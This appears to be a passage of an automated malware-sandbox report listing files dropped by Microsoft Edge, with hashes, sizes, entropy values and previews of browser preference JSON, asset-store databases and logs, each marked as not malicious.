                                                                                                                                                                                  SSDEEP:768:3DXzgWPsj/qlGJqIY8GB4xKyGti1zNt2C9RaDQrbFDdPVFe3KJDSgzMMd6qD47uv:3/Ps+wsI7yOK+MKtSmd6qE7lFov
                                                                                                                                                                                  MD5:EA45D88FD599FB7EE02401775DB963A4
                                                                                                                                                                                  SHA1:E9563B714E7ED0E7F34BAA1FA1324C2A35789C6A
                                                                                                                                                                                  SHA-256:9499097AE4754C19DB70E811DF50CB2805333A7E6C3CE53F9220C972F5B60374
                                                                                                                                                                                  SHA-512:1652F91E834E142D8697FACB09A6AF129265456FDC35D94405D8A3D26FDA16AB662F3D4778084AD0943C38A0D6C1681A53074B66283067B5C73545E171E61141
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):44898
                                                                                                                                                                                  Entropy (8bit):6.095204755186144
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWXHi1zNtTDmNMahWz9KJDSgzMMd6qD47u3+Ciob:+/Ps+wsI7ynfmgKtSmd6qE7lFob
                                                                                                                                                                                  MD5:475969CAA3ABC3B87BBA8A06A26416EC
                                                                                                                                                                                  SHA1:1F0D12C224795390E1996FF32EFB38B826D05D32
                                                                                                                                                                                  SHA-256:E5251D710E1B5A6A7F2F56B3C0253ED7D56F144521190BB45A2C2BD119397B75
                                                                                                                                                                                  SHA-512:5FE095478DBBFDE8C4C96BA5377667647E7329DA927A1AA81941A49A69C305C66F6FBE62DF71CEAD702F09AB558652826CC142D1537A8DD6185E9830AAC81C0C
                                                                                                                                                                                  Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):44957
                                                                                                                                                                                  Entropy (8bit):6.095554059079671
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4xWtmi1zNt2C9RaDQrbFDdPVFe3KJDSgzMMd6qD47u3S:+/Ps+wsI7yOcMKtSmd6qE7lFoC
                                                                                                                                                                                  MD5:FE84E92018F3B968DA2014E41152C7CA
                                                                                                                                                                                  SHA1:C1F4F95B33FB70BA94CEFBEDF677F4389739351F
                                                                                                                                                                                  SHA-256:0FC85411DF19C624A8E3B2461BBC1D7FD1EAD204CE4E2779E615066E98C114F8
                                                                                                                                                                                  SHA-512:04359463768067F9498AB4229EE7F9772E56C905E4D91B6FFC72D85FEC604308DDB67F42003BD07E1C145E44C433EBDFEC56C9233E96972995B00CDA8547D6FA
                                                                                                                                                                                  Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):45888
                                                                                                                                                                                  Entropy (8bit):6.092452763439603
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:5DXzgWPsj/qlGJqIY8GB4xKB9ri1zNt2C6RaDQrbFDdPVFe3KJDSgzMMd6qD47uv:5/Ps+wsI7yOKSzKtSmd6qE7lFov
                                                                                                                                                                                  MD5:59FDE905F94F8C076F3E3283A4DDF8CD
                                                                                                                                                                                  SHA1:9B1E507572E8180B49B5FB1F117322AF35D1E5B2
                                                                                                                                                                                  SHA-256:1C1C2C921D58C9A8F587B0F11698519CB3074660D089FFA6B0934577622B6571
                                                                                                                                                                                  SHA-512:9EB33BCB3CCBDA73EF312B955A14B7ED62F55EE550537F10DF815ED400131F91E3BB47A0D48B001F17BCD2307D35F0CF20E09245852439E236FD8221A1DEEB95
                                                                                                                                                                                  Malicious:false
Preview:{"abusive_adblocker_etag":"\"270EEF00BF873436BAE0FD02F259866ED05E6988F78734E2F33D6DB953BC6531\"","apps_count_check_time":"13352988566104161","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1708514970"},"domain_actions_config":"
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                  Entropy (8bit):0.04739453611246985
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:CrJ0pqtmKnOAtJY6JPi6VBKP7+G1gsXXnNIa5EvjBAIhL5Nvf++1gQ8z99tn8y0d:aJ0ctxzMqWnOhttLgH99t08T2RGOD
                                                                                                                                                                                  MD5:CBC9043C79841B1D66E34C83B37CD50E
                                                                                                                                                                                  SHA1:8DD7E35A180E69E8A8A8E17C8B352FBB58ACF45E
                                                                                                                                                                                  SHA-256:BA58870DA4143EEFCCCAFD7F1925302A63DDA19396D98D50E14E87C10963017D
                                                                                                                                                                                  SHA-512:2C15A2949B8BAF2B479AD71AE3E387FC2C534EFE30152B874C9D2A2E9981641579283A843518A2A52F840EE57AA197D7D47D7B12A796A10DDCD6A6E708BF46E6
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:modified
                                                                                                                                                                                  Size (bytes):280
                                                                                                                                                                                  Entropy (8bit):4.0984945491284295
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:FiWWltlcUpPmPIijS3XbnbO6YBVP/Sh/JzvbYuDRBOc7cEJHCll:o1cUh4Y3LbO/BVsJDbYuDRBOycd
                                                                                                                                                                                  MD5:AFAC5E4CC1213807ACB7D1A0F61BCF99
                                                                                                                                                                                  SHA1:FEDCA0A829A0DBCCD1E9D7048398372FF9604783
                                                                                                                                                                                  SHA-256:FF48F538CBF3D665C9B115D6F3F6459E0CD7D9DF368E921E5A4BF2CA88E3C55F
                                                                                                                                                                                  SHA-512:44F1A7E8C8DD1D5CE625AE26ED4074900A979ACD34BAFB3D3B354145690D37D34E07F2D0D9DEE81BE80EAFA9E3973AB11AD6E85EB23A804958584D8DB4902D66
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):25185
                                                                                                                                                                                  Entropy (8bit):5.570782010074086
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:V9ZxMjW2iW5w02f4ri8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPaSIH0+OrwXtGdWps:VvmjjiWa02fKiu1jalf/LdKt7
                                                                                                                                                                                  MD5:834E1966152105D83D9D46757EC7065B
                                                                                                                                                                                  SHA1:D04AF8717E0389EDB9A61920686CBE9E38CADC33
                                                                                                                                                                                  SHA-256:75FAF74683D7C1BA8D60DE0AD7392D1BD5E581DA12D23203E9F997A5374E36B5
                                                                                                                                                                                  SHA-512:B5D2E62A67143FF0F2E17A461B37B89304752337446C76200BB6E99E4E0B13F656152800EDA4ADC38D441ECE53649D227A48F355E3F839FE646E330FDB09B500
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13352988565277124","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13352988565277124","location":5,"ma
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):14093
                                                                                                                                                                                  Entropy (8bit):5.238858716547755
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:st+SPGouSuQKCsF13CDaSLlHVb2VbGqxwPLm2UV0sDxNkYJSHj:sDOoVu13CXYbG3YNAD
                                                                                                                                                                                  MD5:E31BF74E9D1E24DB549B4B2AAF3B6093
                                                                                                                                                                                  SHA1:BF31992AF1C84AAB0B5D021AC0969E71F4A88BDD
                                                                                                                                                                                  SHA-256:CE10670C1E9DC27D7789CE9CDC16EBF4F6A2BC77B1A33FD68F2C7DF2B941B884
                                                                                                                                                                                  SHA-512:EECDDDC37B7F77E0139BCBCDB5E196AFEA8D2C9644161DC8A1B31DC39B8C9931E5D2C904A1F16587AE8D9B7B338619EE919E7EA581E1256025B2503E73EA17A3
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13352988565937492","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):35446
                                                                                                                                                                                  Entropy (8bit):5.558154034307126
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:V9oxKjW3iW5w02f4Gi8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPNSIH0FOrwX/487T7:VKUj2iWa02fBiu1ja+fcLv48fhxth
                                                                                                                                                                                  MD5:16090D47DD286B48BD5CAE39C9E890BA
                                                                                                                                                                                  SHA1:F67171C5C2A8F005AC779567DEF0570546BEBE51
                                                                                                                                                                                  SHA-256:1D9D2D328F05C665A48E139536069C3636320342C03A7B1D8CC5AF7E4E27D871
                                                                                                                                                                                  SHA-512:5F1B2E1AE04898FB7B40FB5F73ED1C3FC42153189F7DE01260904B92D9F14119F1A42A051DAA0ADF961C2C496D066578EBC3444013A3DC6FC9DAFC8512D8F2E9
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13352988565277124","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13352988565277124","location":5,"ma
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):24691
                                                                                                                                                                                  Entropy (8bit):5.567990619159357
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:V9ZxMjWfiW5wj2f4ji8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPySIH0gOrwXthUpcm:Vvmj8iWaj2fGiu1jaXf/Ldxtk
                                                                                                                                                                                  MD5:1D2CA0D90087B30A444E6AA0C683AC73
                                                                                                                                                                                  SHA1:D47B84BE54902C9AA23CC3DAF0C8B667948D4A5A
                                                                                                                                                                                  SHA-256:7A9BF8225C24B4399E6B69D18E13E45E3011A5C519A7CDA78733CB8BF957E110
                                                                                                                                                                                  SHA-512:F444E88B78CF821E681CFF9D583F2D80014D183E7D2D2FE5E478BD0E56CC89266AF4B75CA1B8F0C4016A4540B856A793092C276CB43843A50DB9DD7A1BD824CA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13352988565277124","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13352988565277124","location":5,"ma
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2164095
                                                                                                                                                                                  Entropy (8bit):5.223187384588804
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:IbPMZpVFf0W1XguC5hrslmn+AypENU8ikYSbQbR2z:IbkZpVFfBbmbd
                                                                                                                                                                                  MD5:2321BA90F8D5755129AB8ED8122E5FB0
                                                                                                                                                                                  SHA1:E18B591E73E0020EFD33E7E4230E04789FCA56B8
                                                                                                                                                                                  SHA-256:B5F031C5539CFAA3C5C9122346929C9DA3B24E3A3AE5D2428FB49B1B18F02DF8
                                                                                                                                                                                  SHA-512:E41DD7780E4AAE19EA86A7473CE43C3A4555A5E309D75D75EF968213848D484243FE3C1BD8DEBF24DAC25D0E6C459593DA2953273933EBC2EB2FC2A81105A854
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...m.................DB_VERSION.1.f.+.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340960289901340.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):340
                                                                                                                                                                                  Entropy (8bit):5.053336476560602
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6:rRWiyq2PN723oH+Tcwt9Eh1tIFUt8KRul11Zmw+KR899RkwON723oH+Tcwt9Eh1H:r7yvVaYeb9Eh16FUt8KG/+KuzR5OaYe8
                                                                                                                                                                                  MD5:2B8361B221384654539756FCB3180A95
                                                                                                                                                                                  SHA1:AB35427A48AFA845CA1DE45E96EF54AB9B2CE9DC
                                                                                                                                                                                  SHA-256:50F12D2C4AA1ED01FA879203E35656014B29B503D79A552B8D2191D4357A4E2F
                                                                                                                                                                                  SHA-512:46F451A66E0F959F6BB567D1B4DFF385B5B65F7CAC43B5F981A31E2A11ECD858A778DEC7AC2FD47409856B0B7ABD3A595E4FE5504A4CA0ADEFDD551A1DDCF51C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:2024/02/21-12:30:26.402 30a0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/02/21-12:30:26.405 30a0 Recovering log #3.2024/02/21-12:30:26.869 30a0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):800837
                                                                                                                                                                                  Entropy (8bit):6.007974331872854
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:3+k5cybl1CBO6T3PylHXac11tAmZ3FYVDGVFsvFSpNu375vUxfXOJbgIwUI+IhJ3:3uybl1WEHptAmZaYQFN3MeBgINkg8
                                                                                                                                                                                  MD5:9719E4E34235B7662DF263150CDF0B52
                                                                                                                                                                                  SHA1:22A8AA1E15A8972375CAE8C161B4D6AFDD3FF2D9
                                                                                                                                                                                  SHA-256:CFB4B8273480E1A8DF54118ACCB88CAF02434ABCC3441C3670B16E9FF37E66D2
                                                                                                                                                                                  SHA-512:55311B5A7D35CF357CAA3E032AC2979F73425785B1182BE731CE18BE1DE03C640571437A5BF3388368A2A6C251E4CD0D02C58076153B55B7B714FDDC127830E1
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...m.................DB_VERSION.1`i...................BLOOM_FILTER:..0{"numberOfHashFunctions":8,"shiftBase":8,"bloomFilterArraySize":4753419,"primeBases":[5381,5381,5381,5381],"supportedDomains":"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
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):800777
                                                                                                                                                                                  Entropy (8bit):6.006986780319706
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:M+k5Zybl1CYi6T3Py+HXack1t/m+3FIVD0DFsoFUpNu3m4vU2fX6JVgqwUIQIhJf:Mbybl1fVHkt/m++kBF33LKLgqB6gS
                                                                                                                                                                                  MD5:355C8BA56EF393E82FA820100BACB8BB
                                                                                                                                                                                  SHA1:09C9ADE69D4CB52126F76A71E0209ADBDDECAE06
                                                                                                                                                                                  SHA-256:A18F779C1D7CFA5B6CE89D3F6BF8E5BB5B4BC4D424E2D064B4F64B59A0A02187
                                                                                                                                                                                  SHA-512:B45F39DE5493390ECFC566AF6B4BD81C70445A6E2305D7CC33789B11EB0BC864A10C26CCFAC6C3393F45C4F4FED3555832F2F6B6255FB32C141523796ABBD3C8
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:....0BLOOM_FILTER:........{"numberOfHashFunctions":8,"shiftBase":8,"bloomFilterArraySize":4753419,"primeBases":[5381,5381,5381,5381],"supportedDomains":"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
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
